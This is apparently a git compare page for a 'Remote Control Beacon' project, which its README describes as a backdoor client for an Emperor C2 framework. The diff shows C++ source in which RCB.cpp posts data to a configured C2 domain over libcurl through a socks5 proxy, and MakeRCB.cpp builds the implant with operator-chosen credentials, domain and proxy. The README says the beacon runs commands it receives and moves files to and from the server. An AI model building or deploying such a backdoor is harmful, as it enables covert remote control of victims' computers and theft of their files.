Compare commits

..

No commits in common. "66c0839d5462b1251dd82882bf714b844ac30ee0" and "8fce3c4f76a4ef0423658ad41edd5d5adad367c6" have entirely different histories.

7 changed files with 52 additions and 94 deletions

1
.gitignore vendored
View File

@ -1 +0,0 @@
bin

View File

@ -1,19 +0,0 @@
{
"configurations": {
"Debug RCB": {
"adapter": "vscode-cpptools",
"configuration": {
"type": "cppdbg",
"request": "launch",
"program": "${workspaceRoot}/RCB",
"args": [
],
"cwd": "${workspaceRoot}",
"environment": [
],
"MIMode": "gdb"
}
}
}
}

BIN
MakeRCB Executable file

Binary file not shown.

27
MakeRCB.cpp Normal file
View File

@ -0,0 +1,27 @@
#include <iostream>
#include <string>
int main()
{
std::string sUsername;
std::string sPassword;
std::string sC2Domain;
std::string sProxy;
std::cout << "Enter the username to be used by RCB: ";
std::cin >> sUsername;
std::cout << "Enter the password to be used by RCB: ";
std::cin >> sPassword;
std::cout << "Enter the C2 domain to be used by RCB: ";
std::cin >> sC2Domain;
std::cout << "Enter the socks5 proxy address to be used by RCB: ";
std::cin >> sProxy;
std::string sCommand = "sUsername=" + sUsername + " sPassword=" + sPassword + " sC2Domain=" + "http:/" + sC2Domain + " sProxy=" + "socks5h:/" + sProxy + " make"; // todo: figure out why this works and why // doesn't
const char *cCommand = sCommand.c_str(); // convert string to c string for running as command
system(cCommand); // run the make command with environment variables
}

BIN
RCB Executable file

Binary file not shown.

58
RCB.cpp
View File

@ -1,7 +1,6 @@
#include <curl/curl.h> #include <curl/curl.h>
#include <unistd.h> #include <unistd.h>
#include <array>
#include <fstream> #include <fstream>
#include <iostream> #include <iostream>
#include <regex> #include <regex>
@ -25,61 +24,15 @@ size_t writeCallback(void *contents, size_t size, size_t nmemb, std::string *s)
return newLength; return newLength;
} }
std::string encodeTriplet(std::uint8_t iByte1, std::uint8_t iByte2, std::uint8_t iByte3)
{
std::array<char, 64> encodeTable{'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V',
'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r',
's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/'};
std::string sEncodedTriplet = "";
std::uint32_t combinedTriplet = (iByte1 << 16) | (iByte2 << 8) | iByte3;
sEncodedTriplet += encodeTable[combinedTriplet >> 18];
sEncodedTriplet += encodeTable[combinedTriplet >> 12 & 0x3F];
sEncodedTriplet += encodeTable[combinedTriplet >> 6 & 0x3F];
sEncodedTriplet += encodeTable[combinedTriplet & 0x3F];
return sEncodedTriplet;
}
std::string b64Encode(std::string sWriteData)
{
std::string sEncodedData = "";
std::string sEncodedBuffer;
while (sWriteData.length() > 0)
{
if (sWriteData.length() >= 3)
{
sEncodedData += encodeTriplet(sWriteData[0], sWriteData[1], sWriteData[2]);
sWriteData.erase(0, 3);
}
else if (sWriteData.length() == 2)
{
sEncodedBuffer = encodeTriplet(sWriteData[0], sWriteData[1], '0');
sEncodedBuffer.replace(3, 1, "$");
sEncodedData += sEncodedBuffer;
sWriteData.erase();
}
else if (sWriteData.length() == 1)
{
sEncodedBuffer = encodeTriplet(sWriteData[0], '0', '0');
sEncodedBuffer.replace(2, 2, "$$");
sEncodedData += sEncodedBuffer;
sWriteData.erase();
}
}
return sEncodedData;
}
std::string sendData(std::string sParam1, std::string sValue1, std::string sParam2 = "", std::string sValue2 = "") std::string sendData(std::string sParam1, std::string sValue1, std::string sParam2 = "", std::string sValue2 = "")
{ {
CURL *curl; CURL *curl;
CURLcode res; CURLcode res;
std::string sReadData; std::string sReadData;
sValue1 = b64Encode(sValue1);
std::string sWriteData = sParam1 + "=" + sValue1; std::string sWriteData = sParam1 + "=" + sValue1;
if (sParam2 != "") if (sParam2 != "")
{ {
sValue2 = b64Encode(sValue2);
sWriteData = sWriteData + "&" + sParam2 + "=" + sValue2; sWriteData = sWriteData + "&" + sParam2 + "=" + sValue2;
} }
@ -94,9 +47,9 @@ std::string sendData(std::string sParam1, std::string sValue1, std::string sPara
curl_easy_setopt(curl, CURLOPT_USERNAME, STR(sUsername)); // set username for http auth curl_easy_setopt(curl, CURLOPT_USERNAME, STR(sUsername)); // set username for http auth
curl_easy_setopt(curl, CURLOPT_PASSWORD, STR(sPassword)); // set password for http auth curl_easy_setopt(curl, CURLOPT_PASSWORD, STR(sPassword)); // set password for http auth
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writeCallback); // write function for storing response curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writeCallback); // write function for storing response
// char *cWriteData = curl_easy_escape(curl, sWriteData.c_str(), sWriteData.length()); //char *cWriteData = curl_easy_escape(curl, sWriteData.c_str(), sWriteData.length());
curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE_LARGE, sWriteData.length()); // set the post request field size curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE_LARGE, sWriteData.length()); // set the post request field size
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, sWriteData.c_str()); //); // choose the data to send in the post request curl_easy_setopt(curl, CURLOPT_POSTFIELDS, sWriteData.c_str());//); // choose the data to send in the post request
curl_easy_setopt(curl, CURLOPT_WRITEDATA, &sReadData); // write the data to the writeCallback function curl_easy_setopt(curl, CURLOPT_WRITEDATA, &sReadData); // write the data to the writeCallback function
curl_easy_perform(curl); // run query curl_easy_perform(curl); // run query
} }
@ -184,6 +137,13 @@ int main()
std::string sSplit; std::string sSplit;
for (int i = 0; i < sResponse.length(); i++) for (int i = 0; i < sResponse.length(); i++)
{ {
/*if (sResponse[i] == '\n' && bFilename == true)
{
sData.push_back(sSplit); // add the sSplit string to the vector of strings sCommands
sSplit = ""; // set sSplit to empty
bFilename = false;
}*/
if (sResponse[i] == '=' || sResponse[i] == '&') // if we have reached the end of the parameter if (sResponse[i] == '=' || sResponse[i] == '&') // if we have reached the end of the parameter
{ {
sData.push_back(sSplit); // add the sSplit string to the vector of strings sCommands sData.push_back(sSplit); // add the sSplit string to the vector of strings sCommands

View File

@ -1,9 +0,0 @@
# Remote Control Beacon
A client side Emperor C2 framework backdoor.
This backdoor can communicate with Emperor itself, and can perform the following functions:
* Connect to the server (via TOR through a configured FOB)
* Request and execute commands
* Upload and download files to and from the server
Most of the communications between the client and server are base64 encoded, but not encrypted. This means that the traffic, before reaching the FOB, is unencrypted. I was considering maybe adding RC4 encryption in the future :)